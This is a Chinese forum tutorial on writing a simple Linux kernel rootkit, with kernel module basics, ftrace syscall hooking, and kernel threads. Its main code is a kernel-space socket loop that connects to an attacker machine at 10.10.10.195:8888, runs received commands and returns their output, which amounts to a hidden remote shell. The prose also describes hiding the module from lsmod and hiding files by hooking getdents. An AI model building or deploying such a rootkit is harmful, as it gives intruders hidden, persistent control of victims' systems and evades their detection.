首页
社区
课程
招聘
[原创]编写一个简单的linux kernel rootkit
发表于: 2022-8-8 00:25 16465

[原创]编写一个简单的linux kernel rootkit

2022-8-8 00:25
16465

linux kernel rootkit跟普通的应用层rootkit个人感觉不大,个人感觉区别在于一个运行在用户空间中,一个运行在内核空间中;另一个则是编写时调用的API跟应用层rootkit不同

一个最简单的linux kernel rootkit就是一个linux kernel module

PS:如有错误,请斧正

PS: linux kernel module编写网上资料很多,这里不在过多叙述

1、一个linux kernel module必备的函数为module_initmodule_exit,前者为linux kernel module加载时调用的函数,后者为linux kernel module卸载时调用的函数,如下所示:

2、当然,也有其他module开头的函数,例如ODULE_AUTHOR声明作者等函数,但这些都是可选的

3、linux kernel module打印函数也跟用户态的printf函数不同,为printk函数,当然,也不会打印在终端中,通过printk打印的信息可通过dmesg命令查看

4、一个最简单的linux kernel module如下所示,其中module_init声明了模块加载时的函数example_initmodule_exit声明了模块卸载时调用的函数函数example_exit,这个最简单的linux kernel module实现的功能就是在加载时和卸载时打印字符串

5、linux kernel module可通过make modules命令编译,例如本篇编译的Makefile文件如下所示:

5、linux kernel module使用命令insmod加载,使用rmmod命令卸载,可以使用lsmod命令查看所有已经加载的linux kernel module。上面的linux kernel module运行结果如下图所示:

1、系统调用表(System call Table),是一张由指向实现各种系统调用的内核函数的函数指针组成的表,该表可以基于系统调用编号进行索引,来定位函数地址,完成系统调用(PS: 来自百度百科),系统调用表详细列表如下链接所示:

6bbK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6@1L8%4u0$3j5h3I4V1M7#2)9J5c8X3I4A6L8Y4g2^5i4K6u0r3j5X3I4G2j5W2)9J5c8X3#2S2M7%4c8W2M7W2)9J5c8X3q4J5j5$3S2Q4x3V1k6^5z5o6k6Q4x3V1k6W2L8Y4c8J5P5g2)9J5c8Y4y4&6M7$3y4S2L8r3I4K6i4K6u0r3M7%4W2K6j5$3q4D9L8q4)9#2k6U0j5@1i4K6u0W2N6r3u0D9

2、系统调用表的hook一般可以通过以下几种方式来实现:

利用别人写好的框架,例如ftrace(PS:本文为了方便,即利用此方式)

3、获取系统调用表地址一般也可以通过以下几种方式来实现

通过调用函数kallsyms_lookup_name获取(ps:高版本已经被禁用该函数)

其他方法,不在过多介绍

4、linux kernel rootkit中的某些功能需要通过hook系统调用表的函数来实现,例如监控命令的执行等

1、linux kernel中的多线程可使用宏定义kthread_run来创建一个内核线程,第一个参数为线程要执行的函数名,使用kthread_stop来停止

2、一个简单的多线程示例如下所示:(PS: 这里不用导入那么多头文件,之所以使用这么多头文件,是使用了其他API)

1、linux内核中的通信和用户层面的步骤差不多,都是先创建socket、连接或监听socket、调用函数收发信息、关闭连接

2、不同点在于调用的API不同,linux内核中调用的是sock_create_kern函数来创建socket,调用sock->ops->connect来连接服务端(PS:这里的sock是前面创建的socket连接符),调用kernel_sendmsg来发送信息,调用kernel_recvmsg来接收信息,调用kernel_sock_shutdown函数来关闭连接,调用sock_release函数来释放socket连接符,按照用户层的socket的流程来调用即可

3、上面的api不是唯一的,linux源码中还提供了其他的函数来实现socket连接,感兴趣的可以去查阅相关的linux源码

4、上面只写了socket客户端,不写socket服务端的原因是作者测试了好几套api在5.4的内核版本中,都运行到某个阶段内核就挂了,知道原因的大佬可以指出是什么原因

5、测试用例如下所示:

1、对于一个rootkit来说,最核心的功能点肯定在于能够执行命令

2、在linux内核中,有以下几种方式可以用来执行命令:

调用call_usermodehelper函数直接执行命令

3、这里使用的是第二种方式来执行命令,第一种只做到了无参数命令执行,对于有参数的解析其参数时按照指针数组解析出来的不知道为啥一直是乱码,知道原因的大佬可以指教以下

4、无论是什么方式,都无法将命令回显结果直接写入内存直接读取,所以这里采用的是将命令结果利用>写入某个文件中,然后调用vfs_read函数读取文件获取命令回显,如下所示:

1、对于linux kernel rootkit,很重要的一点就是隐藏自己的存在,不然受害者一个lsmod就发现了

2、通过lsmod读出来的已经加载的内核模块在内存中的表现形式为一个链表,我们可以通过添加、删除这个链表中的节点来实现对内核模块的显示和隐藏

3、我们可以通过THIS_MODULE这个变量来访问上述的连接,幸运的是,官方提供了API 来添加和删除节点,分别为list_dellist_add函数

4、实现该功能源码如下所示:

1、由于前面的命令执行功能获取命令回显结果产生了一些文件,所以我们还要隐藏这些产生从文件来避免我们的rootkit被发现

2、我们可以通过hook sys_getdents系统调用来实现,该系统调用有三个参数,其中第二个参数为一个指针,该指针所存储的即为一个目录的文件和目录信息,在内存中的数据结构为一个链表,通过遍历这个链表然后删除相应的节点即可达到隐藏文件的目的

3、该链表的数据结构如下所示,其中,d_name为文件或目录的名称,d_reclen为长度,通过这两个数据,我们即可实现隐藏文件和目录的功能

4、该功能实现示例如下所示:

1、导入头文件ftrace_helper.h

2、定义一个ftrace_hook hooks结构体数组,如下所示:

调用fh_install_hooks函数挂钩,调用fh_remove_hooks函数解挂即可

1、在linux kernel 4.17之后,系统调用函数的参数全部存储在pt_reg结构体中,要实际访问到其参数,需要去读取该结构体

2、由于rootkit运行在内核空间中,要访问用户空间的数据,需要使用strncpy_from_user等函数将用户空间的变量拷贝到内核空间中

3、要申请内核空间,不能使用malloc,而是要使用kmalloc等函数来申请

1、命令执行

2、隐藏内核模块

3、隐藏文件

1、github链接:

229K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6%4K9h3&6V1P5g2)9J5k6s2m8#2M7Y4m8D9k6g2)9J5c8X3I4A6L8Y4g2^5i4K6g2X3K9$3g2J5L8X3g2D9i4K6g2X3M7X3!0G2N6r3E0A6N6l9`.`.

2、参考链接:

139K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6E0k6h3#2K6k6i4c8Q4x3X3g2%4L8%4u0V1M7s2u0W2M7%4y4Q4x3X3g2U0L8$3#2Q4x3V1j5J5x3o6p5I4i4K6u0r3x3o6q4Q4x3V1j5J5x3q4)9J5c8Y4y4&6M7$3y4S2L8r3I4Q4x3X3c8Z5K9h3A6S2j5$3E0A6L8X3N6Q4x3X3c8V1P5h3&6S2L8h3W2U0j5h3I4D9P5g2)9J5k6r3!0T1N6r3q4A6L8W2)9J5k6s2y4&6M7$3y4S2L8r3I4Q4x3X3c8@1j5h3u0D9k6g2)9J5k6r3q4V1k6s2u0W2M7%4y4Q4x3X3c8C8k6i4u0F1k6h3I4Q4x3X3b7J5i4K6u0V1y4W2)9J5k6s2S2Q4x3V1j5`.

a29K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6E0k6h3#2K6k6i4c8Q4x3X3g2%4L8%4u0V1M7s2u0W2M7%4y4Q4x3X3g2U0L8$3#2Q4x3V1j5J5x3o6p5I4i4K6u0r3x3o6y4Q4x3V1j5I4z5q4)9J5c8Y4y4&6M7$3y4S2L8r3I4Q4x3X3c8Z5K9h3A6S2j5$3E0A6L8X3N6Q4x3X3c8V1P5h3&6S2L8h3W2U0j5h3I4D9P5g2)9J5k6r3!0T1N6r3q4A6L8W2)9J5k6s2y4&6M7$3y4S2L8r3I4Q4x3X3c8@1j5h3u0D9k6g2)9J5k6r3q4V1k6s2u0W2M7%4y4Q4x3X3c8C8k6i4u0F1k6h3I4Q4x3X3b7J5i4K6u0V1y4W2)9J5k6s2S2Q4x3X3b7J5i4K6u0r3

013K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6K6N6r3q4U0K9$3!0$3k6i4u0X3L8r3!0%4i4K6u0W2j5$3!0E0i4K6u0r3M7i4g2W2M7%4c8A6L8$3&6K6i4K6u0r3x3K6V1#2x3o6t1I4z5e0S2Q4x3V1k6X3K9h3&6V1K9h3&6Y4i4K6u0V1N6r3S2W2i4K6u0V1M7%4W2K6i4K6u0V1j5$3q4D9L8q4)9J5k6s2c8S2j5X3I4W2i4K6u0V1K9h3&6Q4x3X3c8E0k6h3#2G2M7Y4W2Q4x3X3b7$3y4q4)9J5k6r3u0A6N6q4)9J5k6r3!0F1i4K6u0V1y4q4)9J5k6s2S2Q4x3X3c8^5i4K6u0V1K9$3g2J5L8X3g2D9

dd1K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6^5j5$3g2D9L8r3g2J5j5i4c8G2M7W2)9J5k6h3N6A6N6r3S2#2j5W2)9J5k6h3W2G2i4K6u0r3M7r3!0K6N6s2y4Q4x3V1k6D9K9h3&6#2P5q4)9#2k6Y4u0G2L8%4c8C8K9i4c8K6i4K6g2X3x3o6q4Q4x3V1j5`.

fbdK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6K6P5i4y4U0j5h3I4D9M7K6j5@1i4K6u0W2M7r3q4G2L8r3!0K6N6r3W2$3j5h3&6A6L8W2)9J5k6h3y4G2L8g2)9J5c8R3`.`.

15bK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6$3K9$3!0T1k6h3I4Q4x3V1k6D9K9h3&6#2P5q4)9J5k6s2y4&6M7$3y4S2L8r3I4Q4x3X3c8Z5L8$3!0C8i4K6u0V1M7X3!0G2N6r3E0A6N6l9`.`.

0d8K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6T1L8r3!0Y4i4K6u0W2j5%4y4V1L8W2)9J5k6h3&6W2N6q4)9J5c8Y4W2W2M7$3S2W2L8X3&6W2N6q4)9J5c8X3q4J5N6r3W2U0L8r3g2Q4x3V1k6V1k6i4c8S2K9h3I4K6i4K6u0r3z5o6t1K6x3e0f1$3x3o6b7`.

378K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2S2L8Y4q4#2j5h3&6C8k6g2)9J5k6h3y4G2L8g2)9J5c8Y4m8G2M7%4c8Q4x3V1k6A6k6q4)9J5c8U0t1@1x3e0l9&6x3l9`.`.

ddfK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2U0L8$3c8W2L8r3g2S2k6r3W2F1k6#2)9J5k6h3y4G2L8g2)9J5c8X3q4J5N6r3W2U0L8r3g2Q4x3V1j5J5y4o6x3^5y4o6j5K6z5e0M7^5y4#2)9J5c8R3`.`.

f37K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2U0L8X3u0D9L8$3N6K6i4K6u0W2j5$3!0E0i4K6u0r3k6h3#2T1k6h3c8V1k6h3c8Q4x3X3c8D9K9h3&6#2P5q4)9J5c8Y4m8Q4x3V1j5%4y4o6x3&6z5e0R3@1i4K6u0W2K9s2c8E0L8l9`.`.

d40K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6K6N6r3q4U0K9$3!0$3k6i4u0X3L8r3!0%4i4K6u0W2j5$3!0E0i4K6u0r3M7i4g2W2M7%4c8A6L8$3&6K6i4K6u0r3y4e0R3^5x3U0p5@1y4e0S2Q4x3V1k6W2M7Y4u0G2M7W2)9J5k6s2m8S2M7%4y4A6L8X3N6Q4x3X3c8S2M7X3N6#2L8h3g2F1N6q4)9J5k6o6q4Q4x3X3c8G2k6W2)9J5k6r3E0@1K9s2u0W2j5h3c8Q4x3X3c8U0M7X3g2S2N6r3g2Q4x3X3c8G2L8W2)9J5k6r3&6G2k6r3g2Q4x3X3c8X3M7X3!0E0i4K6u0V1K9h3&6U0L8$3#2H3j5i4c8A6j5X3I4W2i4K6u0V1M7r3!0A6L8Y4c8W2M7R3`.`.

1acK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6T1L8r3!0Y4i4K6u0W2j5%4y4V1L8W2)9J5k6h3&6W2N6q4)9J5c8Y4q4I4i4K6g2X3x3K6l9$3x3U0b7#2z5e0q4Q4x3V1k6S2M7Y4c8A6j5$3I4W2i4K6u0r3k6r3g2@1j5h3W2D9M7#2)9J5c8U0p5H3z5e0j5^5y4e0j5J5x3l9`.`.

23cK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6S2j5Y4W2K6j5h3#2J5L8%4y4K6i4K6u0r3M7$3W2E0M7r3I4W2i4K6u0V1L8r3W2F1N6i4S2Q4x3X3c8C8k6i4u0F1k6h3I4Q4x3X3c8@1j5%4m8Q4x3X3c8U0L8r3W2W2L8Y4c8Q4x3X3c8K6k6i4u0$3k6i4t1`.

debK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6U0M7X3!0W2L8h3S2W2L8r3c8Q4x3V1k6D9K9$3#2Q4x3X3c8J5L8$3!0@1K9$3W2@1

1e4K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4y4@1i4K6u0W2k6$3W2@1K9s2g2T1i4K6u0W2j5$3!0E0i4K6u0r3L8r3I4B7x3o6V1^5i4K6u0r3y4K6f1J5y4o6p5%4

95fK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6T1L8r3!0Y4i4K6u0W2j5%4y4V1L8W2)9J5k6h3&6W2N6q4)9J5c8X3#2A6j5h3!0Z5L8$3&6Y4P5i4f1I4i4K6u0r3j5i4u0@1K9h3y4D9k6g2)9J5c8X3c8W2N6r3q4A6L8s2y4Q4x3V1j5I4y4U0V1^5y4U0l9#2x3H3`.`.

ad4K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2A6j5$3S2W2L8X3k6#2i4K6u0W2j5$3!0E0i4K6u0r3x3U0l9I4y4#2)9J5c8U0l9I4i4K6u0r3x3e0k6Q4x3V1k6C8k6i4u0F1k6h3I4Q4x3X3c8K6L8$3y4C8i4K6u0V1j5$3I4A6k6h3&6@1i4K6u0V1k6i4S2S2L8i4m8D9k6g2)9J5c8R3`.`.

1f2K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6T1L8r3!0Y4i4K6u0W2j5%4y4V1L8W2)9J5k6h3&6W2N6q4)9J5c8Y4N6Z5M7$3S2A6P5i4g2F1i4K6u0r3j5i4u0@1K9h3y4D9k6g2)9J5c8X3c8W2N6r3q4A6L8s2y4Q4x3V1j5^5x3U0l9I4x3K6p5^5x3b7`.`.

93aK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6V1k6i4k6W2L8r3!0H3k6i4u0Q4x3X3g2S2L8r3W2&6N6h3&6Q4x3X3g2U0L8$3#2Q4x3V1k6S2M7Y4c8A6j5$3I4W2i4K6u0r3y4o6f1&6x3o6t1J5

fe3K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6T1L8r3!0Y4i4K6u0W2j5%4y4V1L8W2)9J5k6h3&6W2N6q4)9J5c8Y4N6Z5j5i4c8V1j5i4W2Q4x3V1k6S2M7Y4c8A6j5$3I4W2i4K6u0r3k6r3g2@1j5h3W2D9M7#2)9J5c8U0V1^5y4o6b7^5y4o6x3#2

 
 
内核版本:5.4.0-120
攻击机:kal
靶机和编译机:ubuntu18 64
内核版本:5.4.0-120
攻击机:kal
靶机和编译机:ubuntu18 64
 
module_init(rootkit_init);
module_exit(rootkit_exit);
module_init(rootkit_init);
module_exit(rootkit_exit);
 
 
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
 
MODULE_LICENSE("GPL");
MODULE_AUTHOR("windy_ll");
MODULE_DESCRIPTION("Basic Kernel Module");
MODULE_VERSION("0.01");
 
static int __init example_init(void)
{
    printk(KERN_INFO "Hello, world!\n");
    return 0;
}
 
static void __exit example_exit(void)
{
    printk(KERN_INFO "Goodbye, world!\n");
}
 
module_init(example_init);
module_exit(example_exit);
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
 
MODULE_LICENSE("GPL");
MODULE_AUTHOR("windy_ll");
MODULE_DESCRIPTION("Basic Kernel Module");
MODULE_VERSION("0.01");
 
static int __init example_init(void)
{
    printk(KERN_INFO "Hello, world!\n");
    return 0;
}
 
static void __exit example_exit(void)
{
    printk(KERN_INFO "Goodbye, world!\n");
}
 
module_init(example_init);
module_exit(example_exit);
obj-m += rootkit.o
 
all:
    make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
 
clean:
    make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
obj-m += rootkit.o
 
all:
    make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
 
clean:
    make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
 
 
 
 
 
 
#include <linux/module.h>
#include <linux/kthread.h>
#include <linux/delay.h>
#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/syscalls.h>
#include <linux/version.h>
#include <linux/namei.h>
#include <linux/moduleparam.h>
#include <linux/sched.h>
#include <linux/fs.h>
#include <linux/uaccess.h>
 
static struct task_struct *test_kthread = NULL;
 
static int kthread_test_func(void *data)
{
    return 0;
}
 
static __init int kthread_test_init(void)
{
    test_kthread = kthread_run(kthread_test_func, NULL, "kthread-test");
    if (!test_kthread) {
        return -ECHILD;
    }
 
    return 0;
}
 
static __exit void kthread_test_exit(void)
{
}
 
module_init(kthread_test_init);
module_exit(kthread_test_exit);
#include <linux/module.h>
#include <linux/kthread.h>
#include <linux/delay.h>
#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/syscalls.h>
#include <linux/version.h>
#include <linux/namei.h>
#include <linux/moduleparam.h>
#include <linux/sched.h>
#include <linux/fs.h>
#include <linux/uaccess.h>
 
static struct task_struct *test_kthread = NULL;
 
static int kthread_test_func(void *data)
{
    return 0;
}
 
static __init int kthread_test_init(void)
{
    test_kthread = kthread_run(kthread_test_func, NULL, "kthread-test");
    if (!test_kthread) {
        return -ECHILD;
    }
 
    return 0;
}
 
static __exit void kthread_test_exit(void)
{
}
 
module_init(kthread_test_init);
module_exit(kthread_test_exit);
 
 
 
 
static int myserver(void *data){
 
        struct socket *sock,*client_sock;
        struct sockaddr_in s_addr;
        unsigned short portnum=8888;
        int ret=0;
        char recvbuf[1024];
    char sendbuf[4096];
    char *result;
        struct msghdr recvmsg,sendmsg;
    struct kvec send_vec,recv_vec;
 
    //sendbuf = kmalloc(1024,GFP_KERNEL);
    if(sendbuf == NULL) {
        printk(KERN_INFO "[SockTest]: sendbuf kmalloc failed!\n");
        return -1;
    }
 
    //recvbuf = kmalloc(1024,GFP_KERNEL);
    if(recvbuf == NULL) {
        printk(KERN_INFO "[SockTest]: recvbuf kmalloc failed!\n");
        return -1;
    }
 
        memset(&s_addr,0,sizeof(s_addr));
        s_addr.sin_family=AF_INET;
        s_addr.sin_port=htons(portnum);
        s_addr.sin_addr.s_addr=in_aton("10.10.10.195");
 
 
        sock=(struct socket *)kmalloc(sizeof(struct socket),GFP_KERNEL);
        client_sock=(struct socket *)kmalloc(sizeof(struct socket),GFP_KERNEL);
 
        /*create a socket*/
        ret=sock_create_kern(&init_net,AF_INET, SOCK_STREAM,0,&sock);
        if(ret < 0){
                printk("[SockTest]:socket_create_kern error!\n");
        return -1;
        }
        printk("[SockTest]:socket_create_kern ok!\n");
 
        /*connect the socket*/
        ret=sock->ops->connect(sock,(struct sockaddr *)&s_addr,sizeof(s_addr),0);
    printk(KERN_INFO "[SockTest]: connect ret = %d\n",ret);
    /*
        if(ret != 0){
                printk("[SockTest]: connect error\n");
                return ret;
        }
    */
        printk("[SockTest]:connect ok!\n");
 
    memset(sendbuf,0,1024);
 
    strcpy(sendbuf,"test");
 
    memset(&sendmsg,0,sizeof(sendmsg));
    memset(&send_vec,0,sizeof(send_vec));
 
    send_vec.iov_base = sendbuf;
    send_vec.iov_len = 4096;   
 
        /*send*/
    ret = kernel_sendmsg(sock,&sendmsg,&send_vec,1,4);
    printk(KERN_INFO "[SockTest]: kernel_sendmsg ret = %d\n",ret);
    if(ret < 0) {
        printk(KERN_INFO "[SockTest]: kernel_sendmsg failed!\n");
        return ret;
    }
    printk(KERN_INFO "[SockTest]: send ok!\n");
    memset(&recv_vec,0,sizeof(recv_vec));
    memset(&recvmsg,0,sizeof(recvmsg));
 
    recv_vec.iov_base = recvbuf;
    recv_vec.iov_len = 1024;
 
        /*kmalloc a receive buffer*/
    while(true) {
        memset(recvbuf, 0, 1024);
 
        ret = kernel_recvmsg(sock,&recvmsg,&recv_vec,1,1024,0);
        printk(KERN_INFO "[SockTest]: received message: %s\n",recvbuf);
        if(!strcmp("exit",recvbuf)) {
            break;
        }
        printk(KERN_INFO "[SockTest]: %ld\n",strlen(recvbuf));
        result = execcmd(recvbuf);
        memset(sendbuf,0,4096);
        strncpy(sendbuf,result,4096);
        ret = kernel_sendmsg(sock,&sendmsg,&send_vec,1,strlen(sendbuf));
    }
 
    kernel_sock_shutdown(sock,SHUT_RDWR);
    sock_release(sock);
    printk(KERN_INFO "[SockTest]: socket exit\n");
 
    return 0;
}
static int myserver(void *data){
 
        struct socket *sock,*client_sock;
        struct sockaddr_in s_addr;
        unsigned short portnum=8888;
        int ret=0;
        char recvbuf[1024];
    char sendbuf[4096];
    char *result;
        struct msghdr recvmsg,sendmsg;
    struct kvec send_vec,recv_vec;
 
    //sendbuf = kmalloc(1024,GFP_KERNEL);
    if(sendbuf == NULL) {
        printk(KERN_INFO "[SockTest]: sendbuf kmalloc failed!\n");
        return -1;
    }
 
    //recvbuf = kmalloc(1024,GFP_KERNEL);
    if(recvbuf == NULL) {
        printk(KERN_INFO "[SockTest]: recvbuf kmalloc failed!\n");
        return -1;
    }
 
        memset(&s_addr,0,sizeof(s_addr));
        s_addr.sin_family=AF_INET;
        s_addr.sin_port=htons(portnum);
        s_addr.sin_addr.s_addr=in_aton("10.10.10.195");
 
 
        sock=(struct socket *)kmalloc(sizeof(struct socket),GFP_KERNEL);
        client_sock=(struct socket *)kmalloc(sizeof(struct socket),GFP_KERNEL);
 
        /*create a socket*/
        ret=sock_create_kern(&init_net,AF_INET, SOCK_STREAM,0,&sock);
        if(ret < 0){
                printk("[SockTest]:socket_create_kern error!\n");
        return -1;
        }
        printk("[SockTest]:socket_create_kern ok!\n");
 
        /*connect the socket*/
        ret=sock->ops->connect(sock,(struct sockaddr *)&s_addr,sizeof(s_addr),0);
    printk(KERN_INFO "[SockTest]: connect ret = %d\n",ret);
    /*
        if(ret != 0){
                printk("[SockTest]: connect error\n");
                return ret;
        }
    */
        printk("[SockTest]:connect ok!\n");
 
    memset(sendbuf,0,1024);
 

[培训]科锐逆向工程师培训第53期2025年7月8日开班!

收藏
免费 7
支持
分享
打赏 + 50.00雪花
打赏次数 1 雪花 + 50.00
 
赞赏  Editor   +50.00 2022/08/17 恭喜您获得“雪花”奖励,安全圈有你而精彩!
最新回复 (0)
游客
登录 | 注册 方可回帖
返回